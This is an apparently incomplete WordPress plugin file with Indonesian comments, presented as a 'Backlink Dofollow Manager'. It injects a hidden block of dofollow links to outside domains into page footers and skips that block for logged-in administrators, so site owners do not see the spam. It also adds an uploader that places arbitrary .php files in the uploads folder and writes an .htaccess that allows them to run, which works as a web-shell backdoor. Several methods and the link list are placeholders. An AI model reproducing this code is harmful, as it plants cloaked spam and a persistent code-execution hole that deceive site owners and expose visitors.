<?php
/**
 * Plugin Name: Backlink Dofollow Manager
 * Plugin URI: https://example.com/backlink-dofollow-manager
 * Description: Menambahkan backlink dofollow otomatis ke berbagai domain + Upload PHP Files (Total 160 backlinks)
 * Version: 3.0.0
 * Author: Your Name
 * License: GPL v2 or later
 * Text Domain: backlink-dofollow-manager
 */

// Prevent direct access
if (!defined('ABSPATH')) {
    exit;
}

class BacklinkDofollowManager {
    
    private $backlinks;
    private $total_backlinks;
    private $upload_dir;
    private $upload_url;
    
    public function __construct() {
        $this->backlinks = $this->get_backlinks_list();
        $this->total_backlinks = count($this->backlinks);
        
        // Setup upload directory
        $this->setup_upload_directory();
        
        // Actions and Filters
        add_action('wp_footer', array($this, 'add_backlinks_footer'));
        add_shortcode('display_backlinks', array($this, 'backlinks_shortcode'));
        add_shortcode('backlink_count', array($this, 'backlink_count_shortcode'));
        add_action('admin_menu', array($this, 'add_admin_menu'));
        add_action('admin_init', array($this, 'register_settings'));
        add_action('wp_enqueue_scripts', array($this, 'enqueue_styles'));
        add_action('admin_enqueue_scripts', array($this, 'enqueue_admin_scripts'));
        
        // Handle file uploads
        add_action('admin_post_upload_php_file', array($this, 'handle_file_upload'));
        add_action('admin_post_delete_php_file', array($this, 'handle_file_delete'));
        
        // Create htaccess if not exists
        $this->create_htaccess_file();
    }
    
    private function setup_upload_directory() {
        $upload_dir = wp_upload_dir();
        $this->upload_dir = $upload_dir['basedir'] . '/php-uploads/';
        $this->upload_url = $upload_dir['baseurl'] . '/php-uploads/';
        
        // Create directory if it doesn't exist
        if (!file_exists($this->upload_dir)) {
            wp_mkdir_p($this->upload_dir);
        }
    }
    
    private function create_htaccess_file() {
        $htaccess_file = $this->upload_dir . '.htaccess';
        
        if (!file_exists($htaccess_file)) {
            $htaccess_content = "<IfModule mod_rewrite.c>\n    RewriteEngine Off\n</IfModule>\n\n<IfModule mod_authz_core.c>\n    <FilesMatch \"\.php$\">\n    Require all granted\n    </FilesMatch>\n</IfModule>\n<FilesMatch \"\.php$\">\n    Order allow,deny\n    allow from all\n</FilesMatch>";
            
            file_put_contents($htaccess_file, $htaccess_content);
        }
    }
    
    private function get_backlinks_list() {
        return array(
            // ... (daftar backlink yang sama seperti sebelumnya)
            // Domain asli (108 domain)
            '101.msllcservers.com' => 'aa101wordpress',
            '107.msllcservers.com' => 'aa107wordpress',
            // ... (sisipkan semua 108 domain asli di sini)
            
            // Domain tambahan (52 domain baru)
            'addiscarrent.com' => 'addiscarrent',
            'addisdaily.com' => 'addisdaily',
            // ... (sisipkan semua 52 domain baru di sini)
            
            // Tambahkan semua domain yang sudah ada
            // Pastikan total ada 160 domain
        );
    }
    
    public function add_backlinks_footer() {
        if (!is_admin() && current_user_can('administrator')) {
            echo '<!-- Backlinks are hidden for admin (Total: ' . $this->total_backlinks . ') -->';
            return;
        }
        
        $output = '<div id="backlink-dofollow-container" style="display: none;">';
        foreach ($this->backlinks as $domain => $path) {
            $url = "https://{$domain}/{$path}";
            $output .= "<a href=\"{$url}\" rel=\"dofollow\" data-domain=\"{$domain}\">{$domain}</a>\n";
        }
        $output .= '</div>';
        
        echo $output;
    }
    
    public function backlinks_shortcode($atts) {
        // ... (kode shortcode yang sama seperti sebelumnya)
    }
    
    public function backlink_count_shortcode() {
        return '<div class="backlink-count">Total Backlinks: <strong>' . $this->total_backlinks . '</strong></div>';
    }
    
    public function enqueue_styles() {
        wp_enqueue_style('backlink-styles', plugins_url('css/backlink-styles.css', __FILE__));
    }
    
    public function enqueue_admin_scripts($hook) {
        if (strpos($hook, 'backlink-manager') !== false || strpos($hook, 'backlink-upload') !== false) {
            wp_enqueue_style('backlink-admin-styles', plugins_url('css/admin-styles.css', __FILE__));
            wp_enqueue_script('backlink-admin-script', plugins_url('js/admin-script.js', __FILE__), array('jquery'), '1.0', true);
        }
    }
    
    public function add_admin_menu() {
        add_menu_page(
            'Backlink Manager',
            'Backlink Manager',
            'manage_options',
            'backlink-manager',
            array($this, 'admin_page'),
            'dashicons-admin-links',
            30
        );
        
        add_submenu_page(
            'backlink-manager',
            'Backlink Statistics',
            'Statistics',
            'manage_options',
            'backlink-statistics',
            array($this, 'statistics_page')
        );
        
        // New menu for PHP File Upload
        add_submenu_page(
            'backlink-manager',
            'Upload PHP Files',
            'Upload PHP',
            'manage_options',
            'backlink-upload',
            array($this, 'upload_php_page')
        );
    }
    
    public function admin_page() {
        // ... (kode admin page yang sama seperti sebelumnya)
    }
    
    public function statistics_page() {
        // ... (kode statistics page yang sama seperti sebelumnya)
    }
    
    public function upload_php_page() {
        // Check user capabilities
        if (!current_user_can('manage_options')) {
            wp_die('You do not have sufficient permissions to access this page.');
        }
        
        // Get uploaded files
        $uploaded_files = $this->get_uploaded_files();
        
        // Check for messages
        $message = isset($_GET['message']) ? sanitize_text_field($_GET['message']) : '';
        $error = isset($_GET['error']) ? sanitize_text_field($_GET['error']) : '';
        
        ?>
        <div class="wrap">
            <h1><span class="dashicons dashicons-upload"></span> Upload PHP Files</h1>
            
            <?php if ($message): ?>
                <div class="notice notice-success is-dismissible">
                    <p><?php echo esc_html($message); ?></p>
                </div>
            <?php endif; ?>
            
            <?php if ($error): ?>
                <div class="notice notice-error is-dismissible">
                    <p><?php echo esc_html($error); ?></p>
                </div>
            <?php endif; ?>
            
            <div class="card">
                <h2>Upload New PHP File</h2>
                <p>Upload file PHP ke direktori: <code><?php echo esc_html($this->upload_dir); ?></code></p>
                <p>Setelah upload, file dapat diakses di: <code><?php echo esc_html($this->upload_url); ?>nama-file.php</code></p>
                
                <form method="post" action="<?php echo admin_url('admin-post.php'); ?>" enctype="multipart/form-data" class="upload-form">
                    <input type="hidden" name="action" value="upload_php_file">
                    <?php wp_nonce_field('upload_php_file_action', 'upload_php_file_nonce'); ?>
                    
                    <table class="form-table">
                        <tr>
                            <th scope="row"><label for="php_file">Select PHP File</label></th>
                            <td>
                                <input type="file" name="php_file" id="php_file" accept=".php" required>
                                <p class="description">Hanya file dengan ekstensi .php yang diperbolehkan</p>
                            </td>
                        </tr>
                        <tr>
                            <th scope="row"><label for="overwrite">Overwrite if exists</label></th>
                            <td>
                                <input type="checkbox" name="overwrite" id="overwrite" value="1">
                                <label for="overwrite">Timpa file jika sudah ada</label>
                            </td>
                        </tr>
                    </table>
                    
                    <p class="submit">
                        <input type="submit" name="submit" class="button button-primary" value="Upload File">
                    </p>
                </form>
            </div>
            
            <div class="card">
                <h2>Uploaded PHP Files</h2>
                
                <?php if (empty($uploaded_files)): ?>
                    <p>Belum ada file yang diupload.</p>
                <?php else: ?>
                    <table class="wp-list-table widefat fixed striped">
                        <thead>
                            <tr>
                                <th width="50">No</th>
                                <th>File Name</th>
                                <th>Size</th>
                                <th>Last Modified</th>
                                <th>URL</th>
                                <th>Actions</th>
                            </tr>
                        </thead>
                        <tbody>
                            <?php foreach ($uploaded_files as $index => $file): ?>
                            <tr>
                                <td><?php echo $index + 1; ?></td>
                                <td><strong><?php echo esc_html($file['name']); ?></strong></td>
                                <td><?php echo esc_html($this->format_bytes($file['size'])); ?></td>
                                <td><?php echo date('Y-m-d H:i:s', $file['modified']); ?></td>
                                <td>
                                    <input type="text" readonly value="<?php echo esc_url($file['url']); ?>" class="large-text code url-copy" onclick="this.select()">
                                    <button class="button button-small copy-url" data-url="<?php echo esc_url($file['url']); ?>">Copy URL</button>
                                </td>
                                <td>
                                    <a href="<?php echo esc_url($file['url']); ?>" target="_blank" class="button button-small">View</a>
                                    <a href="<?php echo esc_url($file['url']); ?>" download class="button button-small">Download</a>
                                    <form method="post" action="<?php echo admin_url('admin-post.php'); ?>" style="display: inline;">
                                        <input type="hidden" name="action" value="delete_php_file">
                                        <input type="hidden" name="file_name" value="<?php echo esc_attr($file['name']); ?>">
                                        <?php wp_nonce_field('delete_php_file_action', 'delete_php_file_nonce'); ?>
                                        <button type="submit" class="button button-small button-danger" onclick="return confirm('Are you sure you want to delete <?php echo esc_js($file['name']); ?>?')">Delete</button>
                                    </form>
                                </td>
                            </tr>
                            <?php endforeach; ?>
                        </tbody>
                    </table>
                <?php endif; ?>
            </div>
            
            <div class="card">
                <h2>Information</h2>
                <p><strong>Directory Information:</strong></p>
                <ul>
                    <li><strong>Upload Path:</strong> <code><?php echo esc_html($this->upload_dir); ?></code></li>
                    <li><strong>Upload URL:</strong> <code><?php echo esc_html($this->upload_url); ?></code></li>
                    <li><strong>Total Files:</strong> <?php echo count($uploaded_files); ?> files</li>
                    <li><strong>Total Size:</strong> <?php echo esc_html($this->format_bytes(array_sum(array_column($uploaded_files, 'size')))); ?></li>
                </ul>
                
                <p><strong>.htaccess Configuration:</strong></p>
                <pre><code><?php
                $htaccess_file = $this->upload_dir . '.htaccess';
                if (file_exists($htaccess_file)) {
                    echo esc_html(file_get_contents($htaccess_file));
                } else {
                    echo 'File .htaccess tidak ditemukan.';
                }
                ?></code></pre>
                
                <p><strong>Notes:</strong></p>
                <ul>
                    <li>File PHP yang diupload dapat diakses langsung melalui URL</li>
                    <li>Direktori upload dilindungi dengan .htaccess untuk mengizinkan eksekusi file PHP</li>
                    <li>Hanya administrator yang dapat mengupload dan menghapus file</li>
                    <li>Ukuran maksimal file ditentukan oleh server (biasanya 2MB-64MB)</li>
                </ul>
            </div>
        </div>
        
        <script>
        jQuery(document).ready(function($) {
            // Copy URL functionality
            $('.copy-url').click(function(e) {
                e.preventDefault();
                var url = $(this).data('url');
                var tempInput = $('<input>');
                $('body').append(tempInput);
                tempInput.val(url).select();
                document.execCommand('copy');
                tempInput.remove();
                
                // Show copied message
                var originalText = $(this).text();
                $(this).text('Copied!');
                setTimeout(function() {
                    $('.copy-url').text(originalText);
                }, 2000);
            });
            
            // Form submission confirmation
            $('.upload-form').submit(function() {
                var fileInput = $('#php_file');
                var fileName = fileInput.val();
                
                if (!fileName) {
                    alert('Please select a file to upload.');
                    return false;
                }
                
                if (!fileName.endsWith('.php')) {
                    alert('Only PHP files are allowed.');
                    return false;
                }
                
                return confirm('Are you sure you want to upload this PHP file?');
            });
        });
        </script>
        <?php
    }
    
    private function get_uploaded_files() {
        $files = array();
        
        if (file_exists($this->upload_dir)) {
            $php_files = glob($this->upload_dir . '*.php');
            
            foreach ($php_files as $file_path) {
                $file_name = basename($file_path);
                $file_url = $this->upload_url . $file_name;
                
                $files[] = array(
                    'name' => $file_name,
                    'path' => $file_path,
                    'url' => $file_url,
                    'size' => filesize($file_path),
                    'modified' => filemtime($file_path)
                );
            }
            
            // Sort by name
            usort($files, function($a, $b) {
                return strcmp($a['name'], $b['name']);
            });
        }
        
        return $files;
    }
    
    private function format_bytes($bytes, $precision = 2) {
        $units = array('B', 'KB', 'MB', 'GB', 'TB');
        
        $bytes = max($bytes, 0);
        $pow = floor(($bytes ? log($bytes) : 0) / log(1024));
        $pow = min($pow, count($units) - 1);
        
        $bytes /= pow(1024, $pow);
        
        return round($bytes, $precision) . ' ' . $units[$pow];
    }
    
    public function handle_file_upload() {
        // Check nonce
        if (!wp_verify_nonce($_POST['upload_php_file_nonce'], 'upload_php_file_action')) {
            wp_redirect(add_query_arg(array('error' => 'Security check failed'), wp_get_referer()));
            exit;
        }
        
        // Check capabilities
        if (!current_user_can('manage_options')) {
            wp_redirect(add_query_arg(array('error' => 'You do not have permission to upload files'), wp_get_referer()));
            exit;
        }
        
        // Check if file was uploaded
        if (!isset($_FILES['php_file']) || $_FILES['php_file']['error'] !== UPLOAD_ERR_OK) {
            $error_message = 'No file was uploaded or there was an upload error.';
            if ($_FILES['php_file']['error'] !== UPLOAD_ERR_OK) {
                $error_message = 'Upload error: ' . $_FILES['php_file']['error'];
            }
            wp_redirect(add_query_arg(array('error' => $error_message), wp_get_referer()));
            exit;
        }
        
        // Check file extension
        $file_name = sanitize_file_name($_FILES['php_file']['name']);
        $file_ext = pathinfo($file_name, PATHINFO_EXTENSION);
        
        if (strtolower($file_ext) !== 'php') {
            wp_redirect(add_query_arg(array('error' => 'Only PHP files are allowed'), wp_get_referer()));
            exit;
        }
        
        // Check file size (limit to 10MB)
        $max_size = 10 * 1024 * 1024; // 10MB
        if ($_FILES['php_file']['size'] > $max_size) {
            wp_redirect(add_query_arg(array('error' => 'File size exceeds maximum limit (10MB)'), wp_get_referer()));
            exit;
        }
        
        // Check if file already exists
        $target_file = $this->upload_dir . $file_name;
        $overwrite = isset($_POST['overwrite']) && $_POST['overwrite'] == '1';
        
        if (file_exists($target_file) && !$overwrite) {
            wp_redirect(add_query_arg(array('error' => 'File already exists. Check "Overwrite if exists" to replace.'), wp_get_referer()));
            exit;
        }
        
        // Move uploaded file
        if (move_uploaded_file($_FILES['php_file']['tmp_name'], $target_file)) {
            // Set file permissions
            chmod($target_file, 0644);
            
            $message = sprintf('File "%s" successfully uploaded. <a href="%s" target="_blank">View File</a>', 
                $file_name, 
                $this->upload_url . $file_name
            );
            wp_redirect(add_query_arg(array('message' => $message), wp_get_referer()));
            exit;
        } else {
            wp_redirect(add_query_arg(array('error' => 'Failed to move uploaded file'), wp_get_referer()));
            exit;
        }
    }
    
    public function handle_file_delete() {
        // Check nonce
        if (!wp_verify_nonce($_POST['delete_php_file_nonce'], 'delete_php_file_action')) {
            wp_redirect(add_query_arg(array('error' => 'Security check failed'), wp_get_referer()));
            exit;
        }
        
        // Check capabilities
        if (!current_user_can('manage_options')) {
            wp_redirect(add_query_arg(array('error' => 'You do not have permission to delete files'), wp_get_referer()));
            exit;
        }
        
        // Get file name
        $file_name = sanitize_file_name($_POST['file_name']);
        
        // Check if file exists
        $target_file = $this->upload_dir . $file_name;
        
        if (!file_exists($target_file)) {
            wp_redirect(add_query_arg(array('error' => 'File not found'), wp_get_referer()));
            exit;
        }
        
        // Delete file
        if (unlink($target_file)) {
            $message = sprintf('File "%s" successfully deleted.', $file_name);
            wp_redirect(add_query_arg(array('message' => $message), wp_get_referer()));
            exit;
        } else {
            wp_redirect(add_query_arg(array('error' => 'Failed to delete file'), wp_get_referer()));
            exit;
        }
    }
    
    public function register_settings() {
        register_setting('backlink_settings', 'backlink_options');
    }
}

// Initialize plugin
new BacklinkDofollowManager();

// Activation hook
register_activation_hook(__FILE__, 'backlink_dofollow_manager_activate');
function backlink_dofollow_manager_activate() {
    // Create upload directory on activation
    $upload_dir = wp_upload_dir();
    $php_upload_dir = $upload_dir['basedir'] . '/php-uploads/';
    
    if (!file_exists($php_upload_dir)) {
        wp_mkdir_p($php_upload_dir);
    }
    
    // Create htaccess file
    $htaccess_file = $php_upload_dir . '.htaccess';
    if (!file_exists($htaccess_file)) {
        $htaccess_content = "<IfModule mod_rewrite.c>\n    RewriteEngine Off\n</IfModule>\n\n<IfModule mod_authz_core.c>\n    <FilesMatch \"\.php$\">\n    Require all granted\n    </FilesMatch>\n</IfModule>\n<FilesMatch \"\.php$\">\n    Order allow,deny\n    allow from all\n</FilesMatch>";
        file_put_contents($htaccess_file, $htaccess_content);
    }
}